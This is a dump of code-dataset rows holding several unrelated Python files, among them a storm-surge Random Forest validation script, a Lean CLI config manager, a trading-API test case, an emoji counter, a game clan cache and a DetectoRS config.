                return []
            if value:
                counts[value * 2] -= counts[value]
            else:
                # keep half of the zeros as originals
                counts[0] -= counts[0] // 2
        return list(counts.elements())
|
[
"tlhuang@tlhuang.net"
] |
tlhuang@tlhuang.net
|
4fb8a6613c23a11b15ea041eb6992e6c99f4496a
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/merra_scripts/03_model_fitting/merraRF882/852-tideGauge.py
|
23b76be58b869b4adff4020388a4f358c87eeb26
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,456
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a Random Forest
model by using the KFOLD method
@author: Michael Tadesse
"""
#import packages
import os
import glob
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
import seaborn as sns
import matplotlib.pyplot as plt
from datetime import datetime
from sklearn.ensemble import RandomForestRegressor
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validateRF():
    """
    Validate a Random Forest surge model for one tide gauge using
    10-fold cross validation (KFOLD).

    Reads lagged MERRA predictors and daily-max surge observations from
    fixed lustre paths, standardizes predictors, reduces them with PCA
    (95% variance), then trains/tests a RandomForestRegressor per fold.
    Per-gauge mean correlation and RMSE are appended to a dataframe that
    is written to dir_out as <tg_name>.csv.
    """
    #defining directories
    dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
    dir_out = "/lustre/fs0/home/mtadesse/merraRFValidation"
    surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"

    #cd to the lagged predictors directory
    os.chdir(dir_in)

    # tide-gauge index range processed by this script instance (one gauge)
    x = 852
    y = 853

    #empty dataframe for model validation
    df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
                                 'num_95pcs','corrn', 'rmse'])

    #looping through
    for tg in range(x,y):
        os.chdir(dir_in)

        #filter only .csv files
        tgNames = []
        for file in glob.glob("*.csv"):
            tgNames.append(file)
        tg_name = sorted(tgNames)[tg]
        print(tg_name)

        ##########################################
        #check if this tg is already taken care of
        ##########################################
        os.chdir(dir_out)
        if os.path.isfile(tg_name):
            print("this tide gauge is already taken care of")
            # NOTE(review): this returns from the whole function rather
            # than `continue`-ing to the next gauge; harmless here only
            # because the range covers a single gauge.
            return "file already analyzed!"

        os.chdir(dir_in)

        #load predictor
        pred = pd.read_csv(tg_name)
        pred.drop('Unnamed: 0', axis = 1, inplace = True)

        #add squared and cubed wind terms (as in WPI model)
        pickTerms = lambda x: x.startswith('wnd')
        wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
        wnd_sqr = pred[wndTerms]**2
        wnd_cbd = pred[wndTerms]**3
        pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)

        #standardize predictor data (all columns except 'date')
        dat = pred.iloc[:,1:]
        scaler = StandardScaler()
        print(scaler.fit(dat))
        dat_standardized = pd.DataFrame(scaler.transform(dat), \
                                        columns = dat.columns)
        pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)

        #load surge data
        os.chdir(surge_path)
        surge = pd.read_csv(tg_name)
        surge.drop('Unnamed: 0', axis = 1, inplace = True)

        #remove duplicated surge rows
        surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
        surge.reset_index(inplace = True)
        surge.drop('index', axis = 1, inplace = True)

        #adjust surge time format to match that of pred
        time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
        surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
        time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
        surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)

        #merge predictors and surge to find common time frame
        pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
        pred_surge.sort_values(by = 'date', inplace = True)

        #find rows that have nans and remove them
        row_nan = pred_surge[pred_surge.isna().any(axis =1)]
        pred_surge.drop(row_nan.index, axis = 0, inplace = True)
        pred_surge.reset_index(inplace = True)
        pred_surge.drop('index', axis = 1, inplace = True)

        #in case pred and surge don't overlap
        if pred_surge.shape[0] == 0:
            print('-'*80)
            print('Predictors and Surge don''t overlap')
            print('-'*80)
            continue

        pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
                                                   pred_surge['date'])), \
                                          columns = ['date'])

        #prepare data for training/testing
        X = pred_surge.iloc[:,1:-1]
        y = pd.DataFrame(pred_surge['surge'])
        y = y.reset_index()
        y.drop(['index'], axis = 1, inplace = True)

        #apply PCA keeping 95% of variance
        pca = PCA(.95)
        pca.fit(X)
        X_pca = pca.transform(X)

        #apply 10 fold cross validation
        # NOTE(review): random_state without shuffle=True raises an error
        # in newer scikit-learn versions -- confirm the pinned version.
        kf = KFold(n_splits=10, random_state=29)

        metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
        for train_index, test_index in kf.split(X):
            X_train, X_test = X_pca[train_index], X_pca[test_index]
            y_train, y_test = y['surge'][train_index], y['surge'][test_index]

            #train regression model
            rf= RandomForestRegressor(n_estimators = 50, random_state = 101, \
                                      min_samples_leaf = 1)
            rf.fit(X_train, y_train)

            #predictions
            predictions = rf.predict(X_test)
            # pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
            #                       pd.DataFrame(np.array(y_test))], \
            #                      axis = 1)
            # pred_obs.columns = ['pred', 'obs']
            # combo = pd.concat([combo, pred_obs], axis = 0)

            #evaluation matrix - check p value
            # folds with statistically insignificant correlation are skipped
            if stats.pearsonr(y_test, predictions)[1] >= 0.05:
                print("insignificant correlation!")
                continue
            else:
                print(stats.pearsonr(y_test, predictions))
                metric_corr.append(stats.pearsonr(y_test, predictions)[0])
                print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
                print()
                metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))

        #number of years used to train/test model
        num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
                     pred_surge['date'][0]).days/365
        longitude = surge['lon'][0]
        latitude = surge['lat'][0]
        num_pc = X_pca.shape[1] #number of principal components
        corr = np.mean(metric_corr)
        rmse = np.mean(metric_rmse)

        print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
              np.mean(metric_rmse), '\n')

        #original size and pca size of matrix added
        new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
        new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
                          'num_95pcs','corrn', 'rmse']
        df = pd.concat([df, new_df], axis = 0)

        #save df as cs - in case of interruption
        os.chdir(dir_out)
        df.to_csv(tg_name)

#run script
validateRF()
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
7c254f2c139a62a672f3fceeef3f56306b55cf97
|
1cbcf8660d3ea833b0a9aa3d36fe07839bc5cfc5
|
/apps/commons/__init__.py
|
0f0e0b7adb01e7e6695254fbea30187fca7ed79c
|
[] |
no_license
|
zhanghe06/migration_project
|
f77776969907740494281ac6d7485f35d4765115
|
0264b292873b211bfeca0d645cc41abc9efe883f
|
refs/heads/master
| 2022-12-12T10:55:43.475939
| 2019-09-29T09:19:13
| 2019-09-29T09:19:13
| 185,584,884
| 0
| 1
| null | 2022-12-08T05:04:58
| 2019-05-08T10:31:57
|
Python
|
UTF-8
|
Python
| false
| false
| 251
|
py
|
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: __init__.py.py
@time: 2019-04-26 20:06
"""
def func():
    """Module-level placeholder function; intentionally does nothing yet."""
    pass
class Main(object):
    """Placeholder class; no behavior implemented yet."""

    def __init__(self):
        # nothing to initialize yet
        pass
if __name__ == '__main__':
    # nothing to run when executed directly yet
    pass
|
[
"zhang_he06@163.com"
] |
zhang_he06@163.com
|
4501f26cfb2bffa45db443d6c895bedead0dabe5
|
5ec7d0bad8a77c79843a2813f5effcb3a2b7e288
|
/lean/components/config/cli_config_manager.py
|
39f62229b4180cd6dba56d0480bf199a2f862c96
|
[
"Apache-2.0"
] |
permissive
|
xdpknx/lean-cli
|
aca9b9c9c4e156c9faefcfa8ccdfc20423b510a0
|
c1051bd3e8851ae96f6e84f608a7116b1689c9e9
|
refs/heads/master
| 2023-08-08T02:30:09.827647
| 2021-09-21T21:36:24
| 2021-09-21T21:36:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,050
|
py
|
# QUANTCONNECT.COM - Democratizing Finance, Empowering Individuals.
# Lean CLI v1.0. Copyright 2021 QuantConnect Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from lean.components.config.storage import Storage
from lean.constants import DEFAULT_ENGINE_IMAGE, DEFAULT_RESEARCH_IMAGE
from lean.models.docker import DockerImage
from lean.models.errors import MoreInfoError
from lean.models.options import ChoiceOption, Option
class CLIConfigManager:
    """The CLIConfigManager class contains all configurable CLI options."""

    def __init__(self, general_storage: Storage, credentials_storage: Storage) -> None:
        """Creates a new CLIConfigManager instance.

        Credentials are kept in a separate storage from the general,
        non-sensitive options.

        :param general_storage: the Storage instance for general, non-sensitive options
        :param credentials_storage: the Storage instance for credentials
        """
        self.user_id = Option("user-id",
                              "The user id used when making authenticated requests to the QuantConnect API.",
                              True,
                              credentials_storage)

        self.api_token = Option("api-token",
                                "The API token used when making authenticated requests to the QuantConnect API.",
                                True,
                                credentials_storage)

        self.default_language = ChoiceOption("default-language",
                                             "The default language used when creating new projects.",
                                             ["python", "csharp"],
                                             False,
                                             general_storage)

        self.engine_image = Option("engine-image",
                                   f"The Docker image used when running the LEAN engine ({DEFAULT_ENGINE_IMAGE} if not set).",
                                   False,
                                   general_storage)

        self.research_image = Option("research-image",
                                     f"The Docker image used when running the research environment ({DEFAULT_RESEARCH_IMAGE} if not set).",
                                     False,
                                     general_storage)

        # every option exposed by `lean config set` / `lean config get`
        self.all_options = [
            self.user_id,
            self.api_token,
            self.default_language,
            self.engine_image,
            self.research_image
        ]

    def get_option_by_key(self, key: str) -> Option:
        """Returns the option matching the given key.

        If no option with the given key exists, an error is raised.

        :param key: the key to look for
        :return: the option having a key equal to the given key
        """
        option = next((x for x in self.all_options if x.key == key), None)

        if option is None:
            raise MoreInfoError(f"There doesn't exist an option with key '{key}'",
                                "https://www.lean.io/docs/lean-cli/api-reference/lean-config-set#02-Description")

        return option

    def get_engine_image(self, override: Optional[str] = None) -> DockerImage:
        """Returns the LEAN engine image to use.

        :param override: the image name to use, overriding any defaults or previously configured options
        :return: the image that should be used when running the LEAN engine
        """
        return self._get_image_name(self.engine_image, DEFAULT_ENGINE_IMAGE, override)

    def get_research_image(self, override: Optional[str] = None) -> DockerImage:
        """Returns the LEAN research image to use.

        :param override: the image name to use, overriding any defaults or previously configured options
        :return: the image that should be used when running the research environment
        """
        return self._get_image_name(self.research_image, DEFAULT_RESEARCH_IMAGE, override)

    def _get_image_name(self, option: Option, default: str, override: Optional[str]) -> DockerImage:
        """Returns the image to use.

        Precedence: explicit override, then the configured option value,
        then the hard-coded default.

        :param option: the CLI option that configures the image type
        :param default: the default image to use when the option is not set and no override is given
        :param override: the image name to use, overriding any defaults or previously configured options
        :return: the image to use
        """
        if override is not None:
            image = override
        else:
            image = option.get_value(default)

        return DockerImage.parse(image)
|
[
"jaspervmerle@gmail.com"
] |
jaspervmerle@gmail.com
|
caab84331a286957688308ab6662f76886565cad
|
d3efc82dfa61fb82e47c82d52c838b38b076084c
|
/Autocase_Result/KZZMM/YW_KZZMM_SHXJ_082.py
|
8be9a19d9eac064c5c1eff466069cccce9c4febe
|
[] |
no_license
|
nantongzyg/xtp_test
|
58ce9f328f62a3ea5904e6ed907a169ef2df9258
|
ca9ab5cee03d7a2f457a95fb0f4762013caa5f9f
|
refs/heads/master
| 2022-11-30T08:57:45.345460
| 2020-07-30T01:43:30
| 2020-07-30T01:43:30
| 280,388,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,053
|
py
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
import sys
sys.path.append("/home/yhl2/workspace/xtp_test/xtp/api")
from xtp_test_case import *
sys.path.append("/home/yhl2/workspace/xtp_test/service")
from ServiceConfig import *
from mainService import *
from QueryStkPriceQty import *
from log import *
sys.path.append("/home/yhl2/workspace/xtp_test/mysql")
from CaseParmInsertMysql import *
sys.path.append("/home/yhl2/workspace/xtp_test/utils")
from QueryOrderErrorMsg import queryOrderErrorMsg
class YW_KZZMM_SHXJ_082(xtp_test_case):
    """Order test: SH convertible bond, limit-price sell at the limit-down price
    (per the case title stored in `title` below)."""

    # YW_KZZMM_SHXJ_082
    def test_YW_KZZMM_SHXJ_082(self):
        # Case title (runtime data, kept in Chinese): "default 3: order price
        # within the price-limit band - SH A-share limit sell == limit-down price"
        title = '默认3:订单报价未超过涨跌幅限制-沪A限价卖=跌停价'
        # Expected values for this test case.
        # Possible order states: initial, not traded, partially traded, fully
        # traded, partial-cancel reported, partially cancelled, reported and
        # pending cancel, cancelled, invalid order, cancel-invalid, internal cancel.
        # xtp_ID and cancel_xtpID default to 0 and need no change.
        case_goal = {
            '期望状态': ['未成交','全成','部成'][trade_type],
            'errorID': 0,
            'errorMSG': '',
            '是否生成报单': '是',
            '是否是撤废': '否',
            'xtp_ID': 0,
            'cancel_xtpID': 0,
        }
        logger.warning(title)

        # Define the order-query parameters ------------------------------------
        # Args: ticker, market, security type, security status, trading status,
        # side (B = buy / S = sell), expected state, Api.
        stkparm = QueryStkPriceQty('110032', '1', '8', '2', '0', 'S', case_goal['期望状态'], Api)

        # If fetching the order parameters failed, fail the case.
        if stkparm['返回结果'] is False:
            rs = {
                '用例测试结果': stkparm['返回结果'],
                '测试错误原因': '获取下单参数失败,' + stkparm['错误原因'],
            }
            self.assertEqual(rs['用例测试结果'], True)
        else:
            # Build the order request: SH A-share market, limit-price sell.
            wt_reqs = {
                'business_type': Api.const.XTP_BUSINESS_TYPE['XTP_BUSINESS_TYPE_CASH'],
                'order_client_id':trade_type + 1,
                'market': Api.const.XTP_MARKET_TYPE['XTP_MKT_SH_A'],
                'ticker': stkparm['证券代码'],
                'side': Api.const.XTP_SIDE_TYPE['XTP_SIDE_SELL'],
                'price_type': Api.const.XTP_PRICE_TYPE['XTP_PRICE_LIMIT'],
                'price': 100,
                'quantity': 200,
                'position_effect': Api.const.XTP_POSITION_EFFECT_TYPE['XTP_POSITION_EFFECT_INIT']
            }
            ParmIni(Api, case_goal['期望状态'], wt_reqs['price_type'])
            CaseParmInsertMysql(case_goal, wt_reqs)
            rs = serviceTest(Api, case_goal, wt_reqs)
            logger.warning('执行结果为' + str(rs['用例测试结果']) + ','
                           + str(rs['用例错误源']) + ',' + str(rs['用例错误原因']))
            self.assertEqual(rs['用例测试结果'], True) # 0
if __name__ == '__main__':
    # run this single test case via unittest's discovery
    unittest.main()
|
[
"418033945@qq.com"
] |
418033945@qq.com
|
a9cfb2037e52211b220afeeb004deb4751481476
|
7fb2fa25c86a824343b6ca0974978db6b12e5590
|
/analysis/count_emojis.py
|
4921e65519970758f36b23edfb37ee5697942392
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
pmichel31415/mtnt
|
ff3d6f509e665c525946dd0635904cb0a3f9766b
|
2a7e9a36b36bd1e95d6d8ab9f28f1d9359240807
|
refs/heads/master
| 2021-04-06T02:25:17.441054
| 2019-04-02T18:13:05
| 2019-04-02T18:13:05
| 125,262,764
| 61
| 7
|
MIT
| 2019-02-26T16:01:56
| 2018-03-14T19:22:44
|
Python
|
UTF-8
|
Python
| false
| false
| 477
|
py
|
#!/usr/bin/python3
"""
Count the number of emojis in the input
"""
import sys
import emoji
import re
# ASCII emoticon: eyes (8 : ; =), optional nose (^ ' -), mouth ( ) ( D P p )
txt_emoji_regex = re.compile(r'(8|:|;|=)(\^|\'|-)?(\)|\(|D|P|p)')
# regexp matching unicode emoji codepoints (supplied by the emoji package)
utf8_emoji_regex = emoji.get_emoji_regexp()

# number of whitespace-separated tokens containing at least one emoji
N = 0
try:
    for line in sys.stdin:
        for w in line.strip().split():
            if txt_emoji_regex.search(w) or utf8_emoji_regex.search(w):
                N += 1
except (KeyboardInterrupt, EOFError):
    # stop counting early, but still report what was counted so far
    pass
finally:
    print(N)
|
[
"pmichel31415@gmail.com"
] |
pmichel31415@gmail.com
|
56aea531c535900df425e4611b4776b282f6fa44
|
46ae8264edb9098c9875d2a0a508bc071201ec8b
|
/res/scripts/client/gui/sharedclancache.py
|
1aa1b48a5532bacd3c62029590bc3c3bcdcd0503
|
[] |
no_license
|
Difrex/wotsdk
|
1fc6156e07e3a5302e6f78eafdea9bec4c897cfb
|
510a34c67b8f4c02168a9830d23f5b00068d155b
|
refs/heads/master
| 2021-01-01T19:12:03.592888
| 2016-10-08T12:06:04
| 2016-10-08T12:06:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,099
|
py
|
# Embedded file name: scripts/client/gui/shared/ClanCache.py
from collections import namedtuple
import BigWorld
from Event import Event
from account_helpers import getAccountDatabaseID
from adisp import async, process
from constants import CLAN_MEMBER_FLAGS
from debug_utils import LOG_ERROR
from helpers import html
from gui.clans.formatters import getClanRoleString
from gui.shared.fortifications.fort_provider import ClientFortProvider
from gui.shared.utils import code2str
from messenger.ext import passCensor
from messenger.proto.events import g_messengerEvents
from messenger.storage import storage_getter
class ClanInfo(namedtuple('ClanInfo', ('clanName',
                                       'clanAbbrev',
                                       'chatChannelDBID',
                                       'memberFlags',
                                       'enteringTime'))):
    """Immutable record describing the player's clan membership."""

    def getClanName(self):
        """Full clan name."""
        return self.clanName

    def getClanAbbrev(self):
        """Short clan abbreviation/tag."""
        return self.clanAbbrev

    def getMembersFlags(self):
        """Member flags value for this player."""
        return self.memberFlags

    def getJoiningTime(self):
        """Time the player entered the clan."""
        return self.enteringTime
class _ClanCache(object):
def __init__(self):
self.__waitForSync = False
self.__fortProvider = None
self.__clanMembersLen = None
self.__clanMotto = ''
self.__clanDescription = ''
self.onSyncStarted = Event()
self.onSyncCompleted = Event()
return
def init(self):
self.__fortProvider = ClientFortProvider()
def fini(self):
self.onSyncStarted.clear()
self.onSyncCompleted.clear()
self.clear()
def onAccountShowGUI(self):
self.__startFortProvider()
def onAvatarBecomePlayer(self):
self.__stopFortProvider()
def onDisconnected(self):
self.__stopFortProvider()
@property
def waitForSync(self):
return self.__waitForSync
@async
def update(self, diff = None, callback = None):
self.__invalidateData(diff, callback)
def clear(self):
self.__fortProvider = None
return
@storage_getter('users')
def usersStorage(self):
return None
@property
def fortProvider(self):
return self.__fortProvider
@property
def clanDBID(self):
from gui.shared import g_itemsCache
return g_itemsCache.items.stats.clanDBID
@property
def isInClan(self):
"""
@return: is current player in clan
"""
return self.clanDBID is not None and self.clanDBID != 0
@property
def clanMembers(self):
members = set()
if self.isInClan:
members = set(self.usersStorage.getClanMembersIterator(False))
return members
@property
def clanInfo(self):
from gui.shared import g_itemsCache
info = g_itemsCache.items.stats.clanInfo
if info and len(info) > 1:
return info
else:
return (None, None, -1, 0, 0)
@property
def clanName(self):
return passCensor(html.escape(self.clanInfo[0]))
@property
def clanAbbrev(self):
return self.clanInfo[1]
@property
def clanMotto(self):
return self.__clanMotto
@property
def clanDescription(self):
return self.__clanDescription
@property
def clanTag(self):
result = self.clanAbbrev
if result:
return '[%s]' % result
return result
@property
def clanCommanderName(self):
for member in self.clanMembers:
if member.getClanRole() == CLAN_MEMBER_FLAGS.LEADER:
return member.getName()
return None
@property
def clanRole(self):
user = self.usersStorage.getUser(getAccountDatabaseID())
if user:
role = user.getClanRole()
else:
role = 0
return role
@property
def isClanLeader(self):
return self.clanRole == CLAN_MEMBER_FLAGS.LEADER
@async
@process
def getClanEmblemID(self, callback):
clanEmblem = None
if self.isInClan:
tID = 'clanInfo' + BigWorld.player().name
clanEmblem = yield self.getClanEmblemTextureID(self.clanDBID, False, tID)
callback(clanEmblem)
return
@async
def getFileFromServer(self, clanId, fileType, callback):
if not BigWorld.player().serverSettings['file_server'].has_key(fileType):
LOG_ERROR("Invalid server's file type: %s" % fileType)
self._valueResponse(0, (None, None), callback)
return None
else:
clan_emblems = BigWorld.player().serverSettings['file_server'][fileType]
BigWorld.player().customFilesCache.get(clan_emblems['url_template'] % clanId, lambda url, file: self._valueResponse(0, (url, file), callback), True)
return None
@async
@process
def getClanEmblemTextureID(self, clanDBID, isBig, textureID, callback):
import imghdr
if clanDBID is not None and clanDBID != 0:
_, clanEmblemFile = yield self.getFileFromServer(clanDBID, 'clan_emblems_small' if not isBig else 'clan_emblems_big')
if clanEmblemFile and imghdr.what(None, clanEmblemFile) is not None:
BigWorld.wg_addTempScaleformTexture(textureID, clanEmblemFile)
callback(textureID)
return
callback(None)
return
def getClanRoleUserString(self):
position = self.clanInfo[3]
return getClanRoleString(position)
def onClanInfoReceived(self, clanDBID, clanName, clanAbbrev, clanMotto, clanDescription):
self.__clanMotto = passCensor(html.escape(clanMotto))
self.__clanDescription = passCensor(html.escape(clanDescription))
def _valueResponse(self, resID, value, callback):
if resID < 0:
LOG_ERROR('[class %s] There is error while getting data from cache: %s[%d]' % (self.__class__.__name__, code2str(resID), resID))
return callback(value)
callback(value)
def _onResync(self):
if not self.__waitForSync:
self.__invalidateData()
def __invalidateData(self, diff = None, callback = lambda *args: None):
if diff is not None:
if 'stats' in diff and 'clanInfo' in diff['stats']:
self.__fortProvider.resetState()
callback(True)
return
def __startFortProvider(self):
self.__clanMembersLen = len(self.clanMembers)
g_messengerEvents.users.onClanMembersListChanged += self.__me_onClanMembersListChanged
self.__fortProvider.start(self)
def __stopFortProvider(self):
self.__clanMembersLen = None
g_messengerEvents.users.onClanMembersListChanged -= self.__me_onClanMembersListChanged
self.__fortProvider.stop()
return
    def __me_onClanMembersListChanged(self):
        """Messenger event handler: react to clan roster list changes."""
        clanMembersLen = len(self.clanMembers)
        # Only act when the member count really differs from the cached
        # snapshot; both the provider reset and the notification are skipped
        # for no-op events.
        if self.__clanMembersLen is not None and clanMembersLen != self.__clanMembersLen:
            self.__clanMembersLen = clanMembersLen
            self.__fortProvider.resetState()
            self.__fortProvider.notify('onClanMembersListChanged')
        return
g_clanCache = _ClanCache()
|
[
"m4rtijn@gmail.com"
] |
m4rtijn@gmail.com
|
0ce2e5cbbf0829c6f3a636aa81c11c8deda2ed4b
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/detection/YOLOX_ID2833_for_PyTorch/configs/detectors/cascade_rcnn_r50_rfp_1x_coco.py
|
176131d6ee71e712688423706383ed6a3a13e405
|
[
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 1,498
|
py
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) Open-MMLab. All rights reserved.
# Inherit the standard Cascade R-CNN (ResNet-50 + FPN) model, the COCO
# detection data pipeline, the 1x training schedule and the default runtime.
_base_ = [
    '../_base_/models/cascade_rcnn_r50_fpn.py',
    '../_base_/datasets/coco_detection.py',
    '../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
# Override the base model into a DetectoRS variant: DetectoRS_ResNet backbone
# feeding a Recursive Feature Pyramid (RFP) neck.
model = dict(
    backbone=dict(
        type='DetectoRS_ResNet',
        # ConvAWS: convolution with Adaptive Weight Standardization
        # (DetectoRS component) — TODO confirm against mmdet docs.
        conv_cfg=dict(type='ConvAWS'),
        # output_img=True: presumably also returns the raw input image,
        # which the RFP neck consumes — matches upstream DetectoRS configs.
        output_img=True),
    neck=dict(
        type='RFP',
        rfp_steps=2,  # number of recursive feedback unrollings
        aspp_out_channels=64,
        aspp_dilations=(1, 3, 6, 1),
        # Auxiliary backbone instantiated inside the RFP neck; takes the
        # feedback features via rfp_inplanes channels.
        rfp_backbone=dict(
            rfp_inplanes=256,
            type='DetectoRS_ResNet',
            depth=50,
            num_stages=4,
            out_indices=(0, 1, 2, 3),
            frozen_stages=1,  # freeze the stem and first stage during training
            norm_cfg=dict(type='BN', requires_grad=True),
            norm_eval=True,  # keep BatchNorm running stats fixed while training
            conv_cfg=dict(type='ConvAWS'),
            pretrained='torchvision://resnet50',
            style='pytorch')))
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.